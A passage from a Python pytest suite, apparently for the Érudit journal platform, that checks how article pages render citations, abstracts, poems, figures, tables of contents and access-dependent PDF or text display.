open('tests/fixtures/issue/ri04376.xml', 'rb').read(),
)
article = ArticleFactory(
localidentifier='article',
issue=issue,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the journal name is displayed in French and English (Relations industrielles
# / Industrial Relations).
assert '<dd id="id_cite_mla_article" class="cite-mla">\n Pratt, Lynda. ' \
'« Robert Southey, Writing and Romanticism. » <em>Relations ' \
'industrielles / Industrial Relations</em>, volume 73, numéro 4, automne 2018. ' \
'https://doi.org/10.7202/009255ar\n </dd>' in html
assert '<dd id="id_cite_apa_article" class="cite-apa">\n ' \
'Pratt, L. (2019). Robert Southey, Writing and Romanticism. ' \
'<em>Relations industrielles / Industrial Relations</em>. ' \
'https://doi.org/10.7202/009255ar\n </dd>' in html
assert '<dd id="id_cite_chicago_article" class="cite-chicago">\n ' \
'Pratt, Lynda « Robert Southey, Writing and Romanticism ». ' \
'<em>Relations industrielles / Industrial Relations</em> (2019). ' \
'https://doi.org/10.7202/009255ar\n </dd>' in html
@pytest.mark.parametrize('fixture, url_name, expected_result', (
# Multilingual journals should have all titles in citations.
('ri04376', 'public:journal:article_citation_enw',
'%J Relations industrielles / Industrial Relations'),
('ri04376', 'public:journal:article_citation_ris',
'JO - Relations industrielles / Industrial Relations'),
('ri04376', 'public:journal:article_citation_bib',
'journal="Relations industrielles / Industrial Relations",'),
# Subtitles should not be included in citations.
('im03868', 'public:journal:article_citation_enw', '%J Intermédialités / Intermediality'),
('im03868', 'public:journal:article_citation_ris',
'JO - Intermédialités / Intermediality'),
('im03868', 'public:journal:article_citation_bib',
'journal="Intermédialités / Intermediality'),
))
def test_journal_multilingual_titles_in_article_citation_views(self, fixture, url_name,
expected_result):
issue = IssueFactory()
repository.api.set_publication_xml(
issue.get_full_identifier(),
open('tests/fixtures/issue/{}.xml'.format(fixture), 'rb').read(),
)
article = ArticleFactory(
issue=issue,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
citation = Client().get(url).content.decode()
# Check that the journal's multilingual titles are included in the citation.
assert expected_result in citation
def test_doi_with_extra_space(self):
article = ArticleFactory(
from_fixture='1009368ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that extra space around DOIs is stripped.
assert '<meta name="citation_doi" content="https://doi.org/10.7202/1009368ar" />' in html
assert '<a href="https://doi.org/10.7202/1009368ar" class="clipboard-data">' in html
def test_unicode_combining_characters(self):
article = ArticleFactory(
from_fixture='1059577ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Pre-combined character is present (ă = ă)
assert '<em>Studii de lingvistică</em>' in html
# Combining character is not present (ă = a + ˘)
assert '<em>Studii de lingvistică</em>' not in html
def test_acknowledgements_and_footnotes_sections_order(self):
article = ArticleFactory(
from_fixture='1060048ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
partiesann = dom.find_all('section', {'class': 'partiesann'})[0]
sections = partiesann.find_all('section')
# Check that acknowledgements are displayed before footnotes.
assert sections[0].attrs['id'] == 'merci'
assert sections[1].attrs['id'] == 'grnote'
def test_abstracts_and_keywords(self):
article = ArticleFactory()
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé français'}])
wrapper.set_abstracts([{'lang': 'en', 'content': 'English abstract'}])
wrapper.add_keywords('es', ['Palabra clave en español'])
wrapper.add_keywords('fr', ['Mot-clé français'])
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grresume = dom.find_all('section', {'class': 'grresume'})[0]
resumes = grresume.find_all('section', {'class': 'resume'})
keywords = grresume.find_all('div', {'class': 'keywords'})
# Make sure the main abstract (English) appears first, even though it's in second position
# in the XML.
assert resumes[0].decode() == '<section class="resume" id="resume-en"><h3>Abstract</h3>\n' \
'<p class="alinea"><em>English abstract</em></p></section>'
# Make sure the French keywords appear in the French abstract section.
assert resumes[1].decode() == '<section class="resume" id="resume-fr"><h3>Résumé</h3>\n' \
'<p class="alinea"><em>Résumé français</em></p>\n' \
'<div class="keywords">\n<p><strong>Mots-clés :</strong>' \
'</p>\n<ul><li class="keyword">Mot-clé français</li></ul>' \
'\n</div></section>'
# Make sure the French keywords appear first since there are no English keywords and no
# Spanish abstract.
assert keywords[0].decode() == '<div class="keywords">\n<p><strong>Mots-clés :</strong>' \
'</p>\n<ul><li class="keyword">Mot-clé français</li>' \
'</ul>\n</div>'
# Make sure the Spanish keywords are displayed even though there is no Spanish abstract.
assert keywords[1].decode() == '<div class="keywords">\n<p><strong>Palabras clave:' \
'</strong></p>\n<ul><li class="keyword">Palabra clave en ' \
'español</li></ul>\n</div>'
@pytest.mark.parametrize('article_type, expected_string', (
('compterendu', 'Un compte rendu de la revue'),
('article', 'Un article de la revue'),
))
def test_review_article_explanatory_note(self, article_type, expected_string):
article = ArticleFactory(type=article_type)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
div = dom.find_all('div', {'class': 'doc-head__metadata'})[1]
note = 'Ce document est le compte-rendu d\'une autre oeuvre tel qu\'un livre ou un ' \
'film. L\'oeuvre originale discutée ici n\'est pas disponible sur cette plateforme.'
assert expected_string in div.decode()
if article_type == 'compterendu':
assert note in div.decode()
else:
assert note not in div.decode()
def test_verbatim_poeme_lines(self):
article = ArticleFactory(
from_fixture='1062061ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
poeme = dom.find('blockquote', {'class': 'verbatim poeme'})
# Check that poem lines are displayed in <p> elements.
assert poeme.decode() == '<blockquote class="verbatim poeme">\n<div class="bloc">\n<p ' \
'class="ligne">Jour de larme, </p>\n<p class="ligne">jour où ' \
'les coupables se réveilleront</p>\n<p class="ligne">pour ' \
'entendre leur jugement,</p>\n<p class="ligne">alors, ô Dieu, ' \
'pardonne-leur et leur donne le repos.</p>\n<p class="ligne">' \
'Jésus, accorde-leur le repos.</p>\n</div>\n</blockquote>'
def test_verbatim_poeme_horizontal_align(self):
article = ArticleFactory(
from_fixture='1070671ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
poeme = dom.find('blockquote', {'class': 'verbatim poeme'}).decode()
# Check that poem lines are centered (align-center).
assert poeme == '<blockquote class="verbatim poeme">\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">On the land</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">On the water</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">Held in <span class="majuscule">Senćoŧen\n' \
' </span>kinship</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">Today is the future</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">It belongs to the next generations</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">of learners — dreamers — healers</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">Maybe one day we will move beyond territorial\n' \
' acknowledgement</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">and gather here in a good way</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">so that the land and their kin</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">can introduce themselves.</p>\n' \
'</div>\n' \
'</blockquote>'
def test_grfigure_caption_position(self):
article = ArticleFactory(
from_fixture='1062105ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grfigure = dom.find('div', {'id': 'gf1'})
grfigure_caption = grfigure.find_all('div', {'class': 'grfigure-caption'})[0]
grfigure_legende = grfigure.find_all('div', {'class': 'grfigure-legende'})[0]
assert grfigure_caption.decode() == '<div class="grfigure-caption">\n<p class="no">' \
'Figure 1</p>\n<div class="legende"></div>\n</div>'
assert grfigure_legende.decode() == '<div class="grfigure-legende">\n<p class="alinea">' \
'<sup>a</sup> Hommes et femmes des générations ' \
'enquêtées (1930-1950 résidant en ' \
'Île-de-France en 1999) et leurs parents.</p>\n' \
'<p class="alinea"><sup>b</sup> L’interprétation de ' \
'cette figure se fait par exemple de la ' \
'manière suivante : Parmi les Ego hommes de ' \
'profession « indépendants », 44 % ont déclaré ' \
'que la profession principale de leur père ' \
'était indépendant, 22,5 % ouvrier, 11,9 % cadre, ' \
'etc. L’origine « père indépendant » est ' \
'nettement surreprésentée chez les Ego hommes ' \
'indépendants. C’est aussi l’origine la plus ' \
'fréquente pour les Ego femmes indépendantes ' \
'(31,5 %), suivie par un père cadre (28,7 %).</p>\n' \
'</div>'
def test_no_liensimple_in_toc_heading(self):
article = ArticleFactory(
from_fixture='1062434ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
li = dom.find('li', {'class': 'article-toc--body'}).find('ul').find_all('li')
# Check that liensimple nodes are not displayed as links in TOC headings.
assert li[1].decode() == '<li><a href="#s1n4">«\xa0D’une vaine dispute – La Musique ' \
'plaisir de l’esprit ou jouissance sensuelle\xa0» par ' \
'Charles Koechlin, (<em><span class="souligne">La Revue ' \
'musicale, 1921</span></em>)</a></li>'
assert li[2].decode() == '<li><a href="#s1n6">« Réponse à quelques objections » par ' \
'Désiré Pâque (<em><span class="souligne">La Revue ' \
'musicale, 1935</span></em>)</a></li>'
def test_related_articles(self, monkeypatch):
journal = JournalFactory()
article_1 = ArticleFactory(issue__journal=journal)
article_2 = ArticleFactory(issue__journal=journal)
article_3 = ArticleFactory(issue__journal=journal)
article_4 = ArticleFactory(issue__journal=journal)
# Mock return value for get_journal_related_articles().
journal_related_articles = []
for article in [article_1, article_2, article_3, article_4]:
journal_related_articles.append(SolrArticle({
'RevueID': article.issue.journal.localidentifier,
'NumeroID': article.issue.localidentifier,
'ID': article.localidentifier,
}))
# Simulate a Solr result with an issue that is not in Fedora.
journal_related_articles.append(SolrArticle({
'RevueID': journal.localidentifier,
'NumeroID': 'not_in_fedora',
'ID': 'not_in_fedora',
}))
# Patch get_journal_related_articles() so it returns our mocked return value.
monkeypatch.setattr(
FakeSolrData,
'get_journal_related_articles',
unittest.mock.Mock(
return_value=journal_related_articles,
),
)
# Create the current article, which should not appear in the related articles.
current_article = ArticleFactory(
issue__journal=journal,
localidentifier='current_article',
)
# Get the response.
url = article_detail_url(current_article)
html = Client().get(url).content
# Get the HTML.
dom = BeautifulSoup(html, 'html.parser')
footer = dom.find('footer', {'class': 'container'})
# There should only be 4 related articles.
assert len(footer.find_all('article')) == 4
# The current article should not be in the related articles.
assert 'current_article' not in footer.decode()
# An article with no issue should not be in related articles.
assert 'not_in_fedora' not in footer.decode()
@pytest.mark.parametrize('with_pdf, pages, has_abstracts, open_access, expected_result', (
# If there's no PDF, there's no need to include `can_display_first_pdf_page` in the context.
(False, [], False, True, False),
# If the article has abstracts, there's no need to include `can_display_first_pdf_page` in
# the context.
(True, [1, 2], True, True, False),
# If content access is granted, `can_display_first_pdf_page` should always be True.
(True, [1], False, True, True),
(True, [1, 2], False, True, True),
# If content access is not granted, `can_display_first_pdf_page` should only be True if the
# PDF has more than one page.
(True, [1], False, False, False),
(True, [1, 2], False, False, True),
))
def test_can_display_first_pdf_page(
self, with_pdf, pages, has_abstracts, open_access, expected_result, monkeypatch,
):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', pages)
article = ArticleFactory(
issue__journal__open_access=open_access,
with_pdf=with_pdf,
)
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé'}])
url = article_detail_url(article)
response = Client().get(url)
if not with_pdf or has_abstracts:
assert 'can_display_first_pdf_page' not in response.context.keys()
else:
assert response.context['can_display_first_pdf_page'] == expected_result
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_complete_processing_article_with_abstracts(self, url_name, open_access):
article = ArticleFactory(
from_fixture='1058611ar',
issue__journal__open_access=open_access,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should be displayed in all cases.
assert full_article.find_all('section', {'id': 'resume'})
# The article body should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'corps'})
else:
assert not full_article.find_all('section', {'id': 'corps'})
# The PDF, PDF first page and first 600 words should never be displayed because we have
# complete processing with abstracts.
assert not full_article.find_all('section', {'id': 'pdf'})
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_complete_processing_article_without_abstracts(self, url_name, open_access):
article = ArticleFactory(
from_fixture='1005860ar',
issue__journal__open_access=open_access,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should not be displayed because we have none.
assert not full_article.find_all('section', {'id': 'resume'})
# The article body should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'corps'})
else:
assert not full_article.find_all('section', {'id': 'corps'})
# The first 600 words should only be displayed on summary page or if content access is not
# granted.
if not open_access or url_name == 'public:journal:article_summary':
assert full_article.find_all('section', {'id': 'first-600-words'})
else:
assert not full_article.find_all('section', {'id': 'first-600-words'})
# PDF or PDF first page should never be displayed because we have complete processing.
assert not full_article.find_all('section', {'id': 'pdf'})
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_minimal_processing_article_with_abstracts(self, url_name, open_access):
article = ArticleFactory(
from_fixture='602354ar',
issue__journal__open_access=open_access,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should be displayed in all cases.
assert full_article.find_all('section', {'id': 'resume'})
# The article PDF should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'pdf'})
else:
assert not full_article.find_all('section', {'id': 'pdf'})
# The article body, first 600 words and PDF first page should never be displayed because
# we have minimal processing with abstracts.
assert not full_article.find_all('section', {'id': 'corps'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
@pytest.mark.parametrize('pages', ([1], [1, 2]))
def test_minimal_processing_article_without_abstracts(self, pages, url_name, open_access):
article = ArticleFactory(
from_fixture='1056823ar',
issue__journal__open_access=open_access,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should not be displayed because we have none.
assert not full_article.find_all('section', {'id': 'resume'})
# The article PDF should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'pdf'})
else:
assert not full_article.find_all('section', {'id': 'pdf'})
# The article PDF first page should only be displayed on summary page or if content access
# is not granted.
if not open_access or url_name == 'public:journal:article_summary':
assert full_article.find_all('section', {'id': 'first-pdf-page'})
else:
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
# The article body and first 600 words should never be displayed because we have minimal
# processing.
assert not full_article.find_all('section', {'id': 'corps'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_minimal_processing_article_without_abstracts_and_with_only_one_page(
self, url_name, open_access, monkeypatch
):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', [1])
article = ArticleFactory(
from_fixture='1056823ar',
issue__journal__open_access=open_access,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should not be displayed because we have none.
assert not full_article.find_all('section', {'id': 'resume'})
# The article PDF should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'pdf'})
else:
assert not full_article.find_all('section', {'id': 'pdf'})
# The article PDF first page should only be displayed on summary page if content access is
# granted because the PDF has only one page.
if open_access and url_name == 'public:journal:article_summary':
assert full_article.find_all('section', {'id': 'first-pdf-page'})
else:
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
# The article body and first 600 words should never be displayed because we have minimal
# processing.
assert not full_article.find_all('section', {'id': 'corps'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
@pytest.mark.parametrize('has_abstracts, expected_alert', (
(True, 'Seul le résumé sera affiché.'),
(False, 'Seuls les 600 premiers mots du texte seront affichés.'),
))
def test_complete_processing_article_content_access_not_granted_alert(
self, has_abstracts, expected_alert,
):
article = ArticleFactory(issue__journal__open_access=False)
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé'}])
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert expected_alert in html
@pytest.mark.parametrize('has_abstracts, pages, expected_alert', (
(True, [1, 2], 'Seul le résumé sera affiché.'),
(True, [1], 'Seul le résumé sera affiché.'),
(False, [1, 2], 'Seule la première page du PDF sera affichée.'),
(False, [1], 'Seule la première page du PDF sera affichée.'),
))
def test_minimal_processing_article_content_access_not_granted_alert(
self, has_abstracts, pages, expected_alert, monkeypatch,
):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', pages)
article = ArticleFactory(
from_fixture='1056823ar',
issue__journal__open_access=False,
with_pdf=True,
)
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé'}])
url = article_detail_url(article)
html = Client().get(url).content.decode()
        # The expected alert should only be displayed if there are abstracts or if the PDF has
        # more than one page.
if has_abstracts or len(pages) > 1:
assert expected_alert in html
else:
assert expected_alert not in html
@pytest.mark.parametrize('fixture, section_id, expected_title', (
# Articles without specified titles in the XML, default values should be used.
('1054008ar', 'grnotebio', 'Note biographique'),
('1054008ar', 'grnote', 'Notes'),
('1059303ar', 'merci', 'Acknowledgements'),
# Articles with specified titles in the XML.
('009676ar', 'grnotebio', 'Collaboratrice'),
('009381ar', 'grnote', 'Notas'),
('1040250ar', 'merci', 'Remerciements et financement'),
))
def test_article_annex_section_titles(self, fixture, section_id, expected_title):
article = ArticleFactory(
from_fixture=fixture,
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
article_toc = dom.find('nav', {'class': 'article-table-of-contents'})
section = dom.find('section', {'id': section_id})
assert article_toc.find('a', {'href': '#' + section_id}).text == expected_title
assert section.find('h2').text == expected_title
@pytest.mark.parametrize('fixture, expected_title', (
('009676ar', 'Bibliographie'),
('1070621ar', 'Bibliography'),
('1054008ar', 'Références'),
))
def test_article_grbiblio_section_titles(self, fixture, expected_title):
article = ArticleFactory(
from_fixture=fixture,
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
article_toc = dom.find('nav', {'class': 'article-table-of-contents'})
section = dom.find('section', {'id': 'grbiblio'})
assert article_toc.find('a', {'href': '#biblio-1'}).text == expected_title
assert section.find('h2').text == expected_title
def test_media_object_source(self):
article = ArticleFactory(
from_fixture='1065018ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
media_object = dom.find('div', {'class': 'media'})
assert media_object.find('cite', {'class': 'source'}).text == 'Courtesy of La compagnie'
def test_media_object_padding_bottom_based_on_aspect_ratio(self):
article = ArticleFactory(
from_fixture='1065018ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
media_object = dom.find('div', {'class': 'embed-responsive'})
assert media_object.get('style') == 'padding-bottom: 56.563%'
@pytest.mark.parametrize('fixture, expected_section_titles', (
('1054008ar', [
'<h2>Suspension du verbe</h2>',
'<h2>Une éthique de l’action</h2>',
'<h3>1– Nécessité de limiter l’action.</h3>',
'<h3>2– Nécessité de simplifier, c’est-à-dire de réduire à l’essentiel.</h3>',
'<h3>3– Nécessité (pour l’homme) de se transformer.</h3>',
'<h2>Une «\xa0poéthique\xa0»</h2>',
'<h2>L’en avant de la parole</h2>',
]),
('1062105ar', [
'<h2><span class="majuscule">Introduction</span></h2>',
'<h2><span class="majuscule">1. La mesure de la mobilitÉ sociale en France et '
'au QuÉbec</span></h2>',
'<h2><span class="majuscule">2. MÉthodes</span></h2>',
'<h3>2.1 Présentation des deux enquêtes et des variables professionnelles '
'sélectionnées</h3>',
'<h3>2.2 Les codages effectués pour mesurer les transmissions '
'professionnelles</h3>',
'<h4><em>2.2.1 Genre et niveau de compétences</em></h4>',
'<h4><em>2.2.2 Catégories socioprofessionnelles</em></h4>',
'<h2><span class="majuscule">3. Évolution de la structure socioprofessionnelle '
'des emplois et transmissions professionnelles au sein des lignÉes</span></h2>',
'<h3>3.1 Répartition des positions socioprofessionnelles dans les lignées des '
'générations enquêtées</h3>',
'<h3>3.2 Transmissions professionnelles dans les lignées</h3>',
'<h2><span class="majuscule">Conclusion</span></h2>',
]),
))
def test_article_toc_view(self, fixture, expected_section_titles):
article = ArticleFactory(
from_fixture=fixture,
issue__journal__open_access=True,
)
url = reverse('public:journal:article_toc', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
for section_title in expected_section_titles:
assert section_title in html
@pytest.mark.parametrize('mock_is_external, mock_url, expected_status_code', [
(False, None, 200),
(True, 'http://www.example.com', 301),
])
def test_get_external_issues_are_redirected(self, mock_is_external, mock_url, expected_status_code, monkeypatch):
monkeypatch.setattr(Article, 'is_external', mock_is_external)
monkeypatch.setattr(Article, 'url', mock_url)
article = ArticleFactory()
url = article_detail_url(article)
response = Client().get(url)
assert response.status_code == expected_status_code
if mock_url:
assert response.url == mock_url
def test_marquage_in_affiliations(self):
article = ArticleFactory(from_fixture='1066010ar')
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert '<li class="auteur-affiliation"><p><strong>Benoit\n Vaillancourt</strong><br>' \
'<span class="petitecap">C</span><span class="petitecap">élat</span>' \
'<span class="petitecap">, Ipac, </span>Université Laval</p></li>' in html
@pytest.mark.parametrize('fixture, expected_link', (
# `https://` should be added to URLs that starts with `www`.
('1038424ar', '<a href="https://www.inspq.qc.ca/pdf/publications/1177_RelGazSchisteSante' \
'%20PubRapPreliminaire.pdf" id="ls3" target="_blank">www.inspq.qc.ca/pdf/' \
'publications/1177_RelGazSchisteSante PubRapPreliminaire.pdf</a>'),
# `https://` should not be added to email addresses.
('1038424ar', '<a href="mailto:yenny.vega.cardenas@umontreal.ca" id="ls1" ' \
'target="_blank">yenny.vega.cardenas@umontreal.ca</a>'),
# Complete URLs should not be altered.
('1038424ar', '<a href="http://www.nytimes.com/2014/12/18/nyregion/cuomo-to-ban-fracking-' \
'in-new-york-state-citing-health-risks.html?_r=0" id="ls4" target="_blank">' \
'http://www.nytimes.com/2014/12/18/nyregion/cuomo-to-ban-fracking-' \
'in-new-york-state-citing-health-risks.html?_r=0</a>'),
# Links to `http://www.erudit.org` should not have target="_blank".
('009256ar', '<a href="http://www.erudit.org/revue/ron/1998/v/n9" id="ls1">' \
'http://www.erudit.org/revue/ron/1998/v/n9</a>'),
))
def test_liensimple_urls(self, fixture, expected_link):
article = ArticleFactory(from_fixture=fixture)
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert expected_link in html
def test_no_white_spaces_around_objetmedia(self):
article = ArticleFactory(
from_fixture='1067517ar',
localidentifier='article',
issue__year='2020',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# No unwanted extra spaces in addition of wanted non-breaking spaces inside quotes.
assert '«\xa0<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwC' \
'AAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" ' \
'data-srcset="/fr/revues/journal/2020-issue/article/media/2127962n.jpg 16w" ' \
'data-aspectratio="0.941176470588235" width="16" height="17" class="lazyload" ' \
'id="im10" alt="forme: forme pleine grandeur">\xa0U+1F469 woman\xa0»' in html
# No unwanted extra spaces inside parentheses.
assert '(<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAA' \
'C0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" ' \
'data-srcset="/fr/revues/journal/2020-issue/article/media/2127980n.jpg 17w" ' \
'data-aspectratio="1.307692307692308" width="17" height="13" class="lazyload" ' \
'id="im34" alt="forme: forme pleine grandeur">)' in html
# No unwanted extra spaces after hashtag.
assert '#<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAA' \
'C0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" ' \
'data-srcset="/fr/revues/journal/2020-issue/article/media/2127981n.jpg 32w" ' \
'data-aspectratio="1.684210526315789" width="32" height="19" class="lazyload" ' \
'id="im35" alt="forme: forme pleine grandeur">' in html
def test_footnote_in_bibliography_title(self):
article = ArticleFactory(from_fixture='1068385ar')
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert '<h2 id="biblio-1">Bibliographie sélective<a href="#no49" id="re1no49" class="norenvoi" ' \
'title="La bibliographie recense exclusivement les travaux cités dans l’article. ' \
'En complément, la base de données des logiciels et projets (cf.\xa0note 2) ' \
'propose pour l’ensemble des logicie[…]">[49]</a>\n</h2>' in html
assert '<li><a href="#biblio-1">Bibliographie sélective</a></li>' in html
    def test_organisation_as_author_is_displayed_in_bold(self):
article = ArticleFactory(from_fixture='1068900ar')
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert '<li class="auteur-affiliation">' \
'<p><strong>The MAP Research Team</strong></p>' \
'</li>' in html
def test_appendices_titles_language(self):
article = ArticleFactory(
from_fixture='1069092ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
sections = dom.find_all('section', {'class': 'grnotebio'})
assert len(sections) == 3
assert sections[0].find('h2').decode() == '<h2>Notes biographiques</h2>'
assert sections[1].find('h2').decode() == '<h2>Biographical notes</h2>'
assert sections[2].find('h2').decode() == '<h2>Notas biograficas</h2>'
class TestArticleRawPdfView:
@unittest.mock.patch.object(JournalDigitalObject, 'logo')
@unittest.mock.patch.object(ArticleDigitalObject, 'pdf')
@unittest.mock.patch.object(subprocess, 'check_call')
def test_can_retrieve_the_pdf_of_existing_articles(self, mock_check_call, mock_pdf, mock_logo):
with open(os.path.join(FIXTURE_ROOT, 'dummy.pdf'), 'rb') as f:
mock_pdf.content = io.BytesIO()
mock_pdf.content.write(f.read())
with open(os.path.join(FIXTURE_ROOT, 'logo.jpg'), 'rb') as f:
mock_logo.content = io.BytesIO()
mock_logo.content.write(f.read())
journal = JournalFactory()
issue = IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now() - dt.timedelta(days=1000))
IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
journal_id = journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
response = ArticleRawPdfView.as_view()(
request, journal_code=journal_id, issue_slug=issue.volume_slug, issue_localid=issue_id,
localid=article_id)
assert response.status_code == 200
assert response['Content-Type'] == 'application/pdf'
def test_cannot_retrieve_the_pdf_of_inexistant_articles(self):
# Note: as there is no Erudit fedora repository used during the
# test, any tentative of retrieving the PDF of an article should
# fail.
journal_id = 'dummy139'
issue_slug = 'test'
